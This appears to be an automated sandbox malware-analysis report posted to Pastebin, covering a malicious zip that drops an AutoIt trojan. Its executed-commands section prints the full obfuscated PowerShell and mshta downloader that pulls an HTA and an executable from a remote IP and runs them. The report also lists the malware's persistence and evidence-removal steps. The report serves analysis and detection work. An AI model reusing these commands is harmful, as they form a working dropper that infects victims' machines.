paladin316

Zips_3000925aed42fa86133ead0cb5279a66_zip_2019-08-05_16_30.txt

Aug 5th, 2019
2,141
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.85 KB | None | 0 0
  1.  
  2. * MalFamily: ""
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Zips_3000925aed42fa86133ead0cb5279a66.zip"
  7. * File Size: 770
  8. * File Type: "Zip archive data, at least v2.0 to extract"
  9. * SHA256: "93a324f957aa65d1c00f4671d1ca34f2356a08c7a203c5140d562cbb360799ff"
  10. * MD5: "3000925aed42fa86133ead0cb5279a66"
  11. * SHA1: "9edd7e4b324de7d477d1c1d93b4b27446b580132"
  12. * SHA512: "eb73c257eb8238931a24315d98f8522ab11fde11373afac0b598f1555e8644d80408491f32b264232ffdf154fb0d8d2f3c4b20eb94337a0bfaa997336661e7da"
  13. * CRC32: "C38CA35B"
  14. * SSDEEP: "24:9uV9yGPlqDtb+nrHCUbCvnfHd5yF0rV9V:9uVRPlqDRaIfHd5yFIV7"
  15.  
  16. * Process Execution:
  17. "cmd.exe",
  18. "powershell.exe",
  19. "mshta.exe",
  20. "powershell.exe",
  21. "eal.exe",
  22. "eal.exe"
  23.  
  24.  
  25. * Executed Commands:
  26. "\"C:\\windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"$rp=stringchar@(0x68,0x74,0x74,0x70) -replace ' ','';$rp=$rp+'://13.75.76.78/stfx/out-454148433.hta';mshta $rp\"",
  27. "C:\\Users\\user\\AppData\\Local\\Temp\\COMPUTER-FAX.PDF.rtf.lnk ",
  28. "\"C:\\Windows\\system32\\mshta.exe\" http://13.75.76.78/stfx/out-454148433.hta",
  29. "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -ExecutionPolicy UnRestricted -Window 1 void $null;$klfycmpwbxn = Get-Random -Min 3 -Max 4;$tghbrksc = (char(char97..char122));$ldezik = -join ($tghbrksc | Get-Random -Count $klfycmpwbxn | % Char$_);$nlsvfzk = char0x2e+char0x65+char0x78+char0x65;$cvxhpzmgsi = $ldezik + $nlsvfzk;$kacbuxfl=char0x53+char0x61+char0x4c;$egyfwhpqk=char0x49+char0x45+char0x58;$shknxqor=char0x73+char0x41+char0x70+char0x53;sAL nfjplmixa $kacbuxfl;$vwignqlmxb=char0x4e+char0x65+char0x74+char0x2e+char0x57+char0x65+char0x62+char0x43+char0x6c+char0x69+char0x65+char0x6e+char0x74;nfjplmixa zqyxmtflv $egyfwhpqk;$phawsqokijc=char0x24+char0x65+char0x6e+char0x76+char0x3a+char0x50+char0x55+char0x42+char0x4c+char0x49+char0x43|zqyxmtflv;nfjplmixa yzlpdtr $shknxqor;$hcnjbu = $phawsqokijc + char0x5c + $cvxhpzmgsi;;;;$ryvjobgep = 'aHR0cDovLzEzLjc1Ljc2Ljc4L3N0ZngvQ09NUFVURVItRkFYLlBERi5leGU=';$ryvjobgep=System.Text.Encoding::UTF8.GetString(System.Convert::FromBase64String($ryvjobgep));$himdak = New-Object $vwignqlmxb;$tjduoxf = $himdak.DownloadData($ryvjobgep);IO.File::WriteAllBytes($hcnjbu, $tjduoxf);yzlpdtr $hcnjbu;;$nyhscdv = @($puohyedcnzj, $tskea, $jfcvo, $pfiwgl);foreach($mxjhzsbwy in $nyhscdv)$null = $_\"\"",
  30. "powershell.exe -ExecutionPolicy UnRestricted -Window 1 void $null;$klfycmpwbxn = Get-Random -Min 3 -Max 4;$tghbrksc = (char(char97..char122));$ldezik = -join ($tghbrksc | Get-Random -Count $klfycmpwbxn | % Char$_);$nlsvfzk = char0x2e+char0x65+char0x78+char0x65;$cvxhpzmgsi = $ldezik + $nlsvfzk;$kacbuxfl=char0x53+char0x61+char0x4c;$egyfwhpqk=char0x49+char0x45+char0x58;$shknxqor=char0x73+char0x41+char0x70+char0x53;sAL nfjplmixa $kacbuxfl;$vwignqlmxb=char0x4e+char0x65+char0x74+char0x2e+char0x57+char0x65+char0x62+char0x43+char0x6c+char0x69+char0x65+char0x6e+char0x74;nfjplmixa zqyxmtflv $egyfwhpqk;$phawsqokijc=char0x24+char0x65+char0x6e+char0x76+char0x3a+char0x50+char0x55+char0x42+char0x4c+char0x49+char0x43|zqyxmtflv;nfjplmixa yzlpdtr $shknxqor;$hcnjbu = $phawsqokijc + char0x5c + $cvxhpzmgsi;;;;$ryvjobgep = 'aHR0cDovLzEzLjc1Ljc2Ljc4L3N0ZngvQ09NUFVURVItRkFYLlBERi5leGU=';$ryvjobgep=System.Text.Encoding::UTF8.GetString(System.Convert::FromBase64String($ryvjobgep));$himdak = New-Object $vwignqlmxb;$tjduoxf = $himdak.DownloadData($ryvjobgep);IO.File::WriteAllBytes($hcnjbu, $tjduoxf);yzlpdtr $hcnjbu;;$nyhscdv = @($puohyedcnzj, $tskea, $jfcvo, $pfiwgl);foreach($mxjhzsbwy in $nyhscdv)$null = $_\"\"",
  31. "C:\\Users\\Public\\eal.exe "
  32.  
  33.  
  34. * Signatures Detected:
  35.  
  36. "Description": "Attempts to connect to a dead IP:Port (2 unique times)",
  37. "Details":
  38.  
  39. "IP": "51.68.247.47:5201"
  40.  
  41.  
  42. "IP": "13.75.76.78:80"
  43.  
  44.  
  45.  
  46.  
  47. "Description": "Creates RWX memory",
  48. "Details":
  49.  
  50.  
  51. "Description": "Expresses interest in specific running processes",
  52. "Details":
  53.  
  54. "process": "eal.exe"
  55.  
  56.  
  57. "process": "svchost.exe"
  58.  
  59.  
  60.  
  61.  
  62. "Description": "Reads data out of its own binary image",
  63. "Details":
  64.  
  65. "self_read": "process: eal.exe, pid: 1612, offset: 0x00000000, length: 0x00124c00"
  66.  
  67.  
  68.  
  69.  
  70. "Description": "A process created a hidden window",
  71. "Details":
  72.  
  73. "Process": "mshta.exe -> powershell.exe"
  74.  
  75.  
  76.  
  77.  
  78. "Description": "Drops a binary and executes it",
  79. "Details":
  80.  
  81. "binary": "C:\\Users\\Public\\eal.exe"
  82.  
  83.  
  84.  
  85.  
  86. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  87. "Details":
  88.  
  89. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  90.  
  91.  
  92. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  93.  
  94.  
  95. "suspicious_request": "http://13.75.76.78/stfx/out-454148433.hta"
  96.  
  97.  
  98. "suspicious_request": "http://13.75.76.78/stfx/COMPUTER-FAX.PDF.exe"
  99.  
  100.  
  101.  
  102.  
  103. "Description": "Performs some HTTP requests",
  104. "Details":
  105.  
  106. "url": "http://13.75.76.78/stfx/out-454148433.hta"
  107.  
  108.  
  109. "url": "http://13.75.76.78/stfx/COMPUTER-FAX.PDF.exe"
  110.  
  111.  
  112.  
  113.  
  114. "Description": "Executed a process and injected code into it, probably while unpacking",
  115. "Details":
  116.  
  117. "Injection": "eal.exe(1612) -> eal.exe(1776)"
  118.  
  119.  
  120.  
  121.  
  122. "Description": "Attempts to remove evidence of file being downloaded from the Internet",
  123. "Details":
  124.  
  125. "file": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\:Zone.Identifier"
  126.  
  127.  
  128.  
  129.  
  130. "Description": "Installs itself for autorun at Windows startup",
  131. "Details":
  132.  
  133. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OyleztRHdq"
  134.  
  135.  
  136. "data": "C:\\Users\\Public\\OyleztRHdq.vbs"
  137.  
  138.  
  139.  
  140.  
  141. "Description": "Attempts to execute a powershell command with suspicious parameter/s",
  142. "Details":
  143.  
  144. "execution_policy": "Attempts to bypass execution policy"
  145.  
  146.  
  147.  
  148.  
  149. "Description": "Attempts to modify proxy settings",
  150. "Details":
  151.  
  152.  
  153. "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
  154. "Details":
  155.  
  156. "dropped": "clamav:Win.Malware.Autoit-7093532-0, sha256:8a5c38eadda65c3aad60d2a237da315c0a0dd1848bbbf46ed616edf073dff1fc , guest_paths:C:\\Users\\user\\klist\\acledit.bat, type:PE32 executable (GUI) Intel 80386, for MS Windows"
  157.  
  158.  
  159. "dropped": "clamav:Win.Malware.Autoit-7093532-0, sha256:cfc4e5af31c58b772eb4ee6f09129373ea7d625c8107f4432b293e981ddfbf51 , guest_paths:C:\\Users\\Public\\eal.exe, type:PE32 executable (GUI) Intel 80386, for MS Windows"
  160.  
  161.  
  162. "dropped": "clamav:Win.Trojan.VBAgent-6647891-0, sha256:cef129fe2f232215e51e51b5cf19ce9bc87ea29bfc7c2e9fe77fa77b6d94c42b , guest_paths:C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\out-4541484331.hta, type:HTML document, ASCII text, with very long lines, with CRLF, LF line terminators"
  163.  
  164.  
  165.  
  166.  
  167. "Description": "Created network traffic indicative of malicious activity",
  168. "Details":
  169.  
  170. "signature": "ET WEB_CLIENT HTA File containing Wscript.Shell Call - Potential CVE-2017-0199"
  171.  
  172.  
  173. "signature": "ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl"
  174.  
  175.  
  176.  
  177.  
  178.  
  179. * Started Service:
  180.  
  181. * Mutexes:
  182. "Local\\ZoneAttributeCacheCounterMutex",
  183. "Local\\ZonesCacheCounterMutex",
  184. "Local\\ZonesLockedCacheCounterMutex",
  185. "Global\\CLR_CASOFF_MUTEX",
  186. "Local\\_!MSFTHISTORY!_",
  187. "Local\\c:!users!user!appdata!local!microsoft!windows!temporary internet files!content.ie5!",
  188. "Local\\c:!users!user!appdata!roaming!microsoft!windows!cookies!",
  189. "Local\\c:!users!user!appdata!local!microsoft!windows!history!history.ie5!",
  190. "Local\\WininetStartupMutex",
  191. "Local\\WininetConnectionMutex",
  192. "Local\\WininetProxyRegistryMutex",
  193. "CicLoadWinStaWinSta0",
  194. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  195. "Global\\.net clr networking"
  196.  
  197.  
  198. * Modified Files:
  199. "C:\\Users\\user\\AppData\\Local\\Temp\\COMPUTER-FAX.PDF.rtf.lnk",
  200. "\\??\\PIPE\\srvsvc",
  201. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\21RXW1QFVJB9C0N970MW.temp",
  202. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\409ef0e3b242f688.customDestinations-ms",
  203. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat",
  204. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat",
  205. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat",
  206. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\out-4541484331.hta",
  207. "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
  208. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\RTISJY1UL340ONLJM5WP.temp",
  209. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
  210. "C:\\Users\\Public\\eal.exe",
  211. "C:\\Users\\user\\klist\\acledit.bat",
  212. "C:\\Users\\Public\\OyleztRHdq.vbs"
  213.  
  214.  
  215. * Deleted Files:
  216. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\21RXW1QFVJB9C0N970MW.temp",
  217. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2996.3842781",
  218. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2996.3842781",
  219. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2996.3842781",
  220. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\RTISJY1UL340ONLJM5WP.temp",
  221. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2924.4735953",
  222. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2924.4735953",
  223. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2924.4735953",
  224. "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\:Zone.Identifier"
  225.  
  226.  
  227. * Modified Registry Keys:
  228. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
  229. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
  230. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
  231. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable",
  232. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer",
  233. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings",
  234. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\powershell_RASAPI32",
  235. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\EnableFileTracing",
  236. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\EnableConsoleTracing",
  237. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\FileTracingMask",
  238. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\ConsoleTracingMask",
  239. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\MaxFileSize",
  240. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\powershell_RASAPI32\\FileDirectory",
  241. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OyleztRHdq",
  242. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\msvideo",
  243. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPer1_0Server",
  244. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\MaxConnectionsPerServer",
  245. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\1U780W5Z52"
  246.  
  247.  
  248. * Deleted Registry Keys:
  249. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  250. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
  251. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  252. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
  253. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride",
  254. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL"
  255.  
  256.  
  257. * DNS Communications:
  258.  
  259. * Domains:
  260.  
  261. * Network Communication - ICMP:
  262.  
  263. * Network Communication - HTTP:
  264.  
  265. "count": 1,
  266. "body": "",
  267. "uri": "http://13.75.76.78/stfx/out-454148433.hta",
  268. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  269. "method": "GET",
  270. "host": "13.75.76.78",
  271. "version": "1.1",
  272. "path": "/stfx/out-454148433.hta",
  273. "data": "GET /stfx/out-454148433.hta HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-US\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: 13.75.76.78\r\nConnection: Keep-Alive\r\n\r\n",
  274. "port": 80
  275.  
  276.  
  277. "count": 1,
  278. "body": "",
  279. "uri": "http://13.75.76.78/stfx/COMPUTER-FAX.PDF.exe",
  280. "user-agent": "",
  281. "method": "GET",
  282. "host": "13.75.76.78",
  283. "version": "1.1",
  284. "path": "/stfx/COMPUTER-FAX.PDF.exe",
  285. "data": "GET /stfx/COMPUTER-FAX.PDF.exe HTTP/1.1\r\nHost: 13.75.76.78\r\nConnection: Keep-Alive\r\n\r\n",
  286. "port": 80
  287.  
  288.  
  289.  
  290. * Network Communication - SMTP:
  291.  
  292. * Network Communication - Hosts:
  293.  
  294. * Network Communication - IRC:
Add Comment
Please, Sign In to add comment